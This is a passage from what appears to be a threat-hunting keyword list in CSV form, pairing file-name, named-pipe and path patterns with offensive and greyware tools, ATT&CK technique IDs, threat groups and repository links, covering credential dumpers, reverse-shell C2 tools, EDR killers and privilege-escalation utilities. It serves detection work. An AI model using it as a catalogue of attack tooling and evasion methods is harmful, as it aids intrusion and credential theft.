T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*[x] Cannot load NTDLL.DLL*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,0,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*[X] Your harvest 
exploded:*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,0,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*\ rev_shell.py*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*\*.O365.GroupMembership_AdminGroups.txt*,offensive_tool_keyword,o365recon,script to retrieve information via O365 and AzureAD with a valid cred ,T1110 - T1081 - T1081.001 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/o365recon,1,0,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*\*.O365.GroupMembership_VPNGroups.txt*,offensive_tool_keyword,o365recon,script to retrieve information via O365 and AzureAD with a valid cred ,T1110 - T1081 - T1081.001 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/o365recon,1,0,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*\*.O365.Roles_Admins.txt*,offensive_tool_keyword,o365recon,script to retrieve information via O365 and AzureAD with a valid cred ,T1110 - T1081 - T1081.001 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/o365recon,1,0,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*\:MLKH*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed HKLM:\,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\\.\pipe\mimi*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense 
Evasion,https://github.com/CCob/SharpBlock,1,0,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -*\\.\pipe\pwned/pipe/srvsvc*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,0,pipe name,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*\\:C*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed c:\\,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\\??\\Jormungandr*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,0,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*\\\\*\\*\\Get-FileLockProcess.ps1*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*\\\\.\\aswSP_Avar*,offensive_tool_keyword,BYOVD_kill_av_edr,BYOD to kill AV/EDR,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c,1,0,N/A,10,3,228,42,2023-06-14T02:13:19Z,2023-01-15T22:37:34Z -*\\\\.\\pipe\\mal*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*\\\\.\\pipe\\warpzone8*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*\\\\127.0.0.1\\pipe\\warpzone8*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*\\127.0.0.1\c$*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*\\c$\Windows\Temp\*.dmp*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*\\DCSC_stdInPipe*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,0,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*\\DCSC_stdOutPipe*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,0,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*\\GetWebDAVStatus.exe*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,0,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*\\pipe\\DAV RPC SERVICE*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,0,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*\1.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False 
positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\1.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\1.Encrypt_shellcode*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,0,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*\1.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\2.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\2.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\2.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\3.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be 
high,2,10,N/A,N/A,N/A,N/A -*\3.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\3.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\4.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\4.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\4.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\5.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\5.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\5.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense 
Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\6.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\6.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\6.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\7.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\7.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\7.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\8.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\8.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 
- T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\8.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,0,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*\9.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\9.dll,greyware_tool_keyword,_,Suspicious file names - 
One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\9.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\AbandonedCOMKeys.*,offensive_tool_keyword,AbandonedCOMKeys,Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence,T1547.011 - T1049 - T1087.002,TA0005 - TA0007 - TA0003,N/A,N/A,Persistence,https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\ADCSPwn*,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,0,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*\ADFSpoof.py*,offensive_tool_keyword,ADFSpoof,A python tool to forge AD FS security tokens.,T1600 - T1600.001 - T1552 - T1552.004,TA0006 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/mandiant/ADFSpoof,1,0,N/A,10,4,300,52,2023-09-21T17:14:52Z,2019-03-20T22:30:58Z -*\ADFSpray*,offensive_tool_keyword,adfspray,Python3 tool to perform password spraying against Microsoft Online service using various methods,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/xFreed0m/ADFSpray,1,0,N/A,N/A,1,75,14,2023-03-12T00:21:34Z,2020-04-23T08:56:51Z -*\ADGet.exe*,greyware_tool_keyword,adget,gather valuable informations about the AD environment,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - 
TA0011,N/A,N/A,Discovery,https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\adm2sys.py*,offensive_tool_keyword,PyExec,This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.,T1134 - T1055 - T1548.002,TA0004 - TA0005 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/OlivierLaflamme/PyExec,1,0,N/A,9,1,10,6,2019-09-11T13:56:04Z,2019-09-11T13:54:15Z -*\admin-panels.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*\agent_exe.exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*\alan.log*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*\Alan.v*.zip*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*\Alcatraz.exe*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z 
-*\All_attack.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*\Andrew.dmp*,offensive_tool_keyword,AndrewSpecial,AndrewSpecial - dumping lsass memory stealthily,T1003.001 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/hoangprod/AndrewSpecial,1,0,N/A,10,4,370,101,2019-06-02T02:49:28Z,2019-01-18T19:12:09Z -*\Angry IP Scanner.app*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*\AntiSandbox.go*,offensive_tool_keyword,goMatrixC2,C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.,T1090 - T1027 - T1071,TA0011 - TA0009 - TA0010,N/A,N/A,C2,https://github.com/n1k7l4i/goMatrixC2,1,1,N/A,10,10,0,2,2023-09-11T10:20:41Z,2023-08-31T09:36:38Z -*\AntiSandbox.go*,offensive_tool_keyword,goZulipC2,C2 leveraging Zulip Messaging Platform as Backend.,T1090 - T1090.003 - T1071 - T1071.001,TA0011 - TA0009,N/A,N/A,C2,https://github.com/n1k7l4i/goZulipC2,1,0,N/A,10,10,5,2,2023-08-31T12:06:58Z,2023-08-13T11:04:20Z -*\AoratosWin*,offensive_tool_keyword,AoratosWin,A tool that removes traces of executed applications on Windows OS.,T1070 - T1564,TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,0,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*\APCLdr.*,offensive_tool_keyword,APCLdr,APCLdr: Payload Loader With Evasion Features,T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/NUL0x4C/APCLdr,1,1,N/A,N/A,3,285,51,2023-01-22T04:24:33Z,2023-01-21T18:09:36Z 
-*\Apollo.exe*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*\AppData\Local\Microsoft\CLR_*\UsageLogs\*.exe.log*,greyware_tool_keyword,cobaltstrike,If cobaltstrike uses execute-assembly there is a chance that a file will be created in the UsageLogs logs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\AppData\Local\Temp\Procmon.exe*,greyware_tool_keyword,procmon,Procmon used in user temp folder,T1059.001 - T1036 - T1569.002,TA0002 - TA0006,N/A,N/A,Reconnaissance,N/A,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\AppData\Local\Temp\Procmon64.exe*,greyware_tool_keyword,procmon,Procmon used in user 
temp folder,T1059.001 - T1036 - T1569.002,TA0002 - TA0006,N/A,N/A,Reconnaissance,N/A,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\asm\x64\alter_pe_sections*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*\asm\x86\alter_pe_sections*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*\Athena-*.zip*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 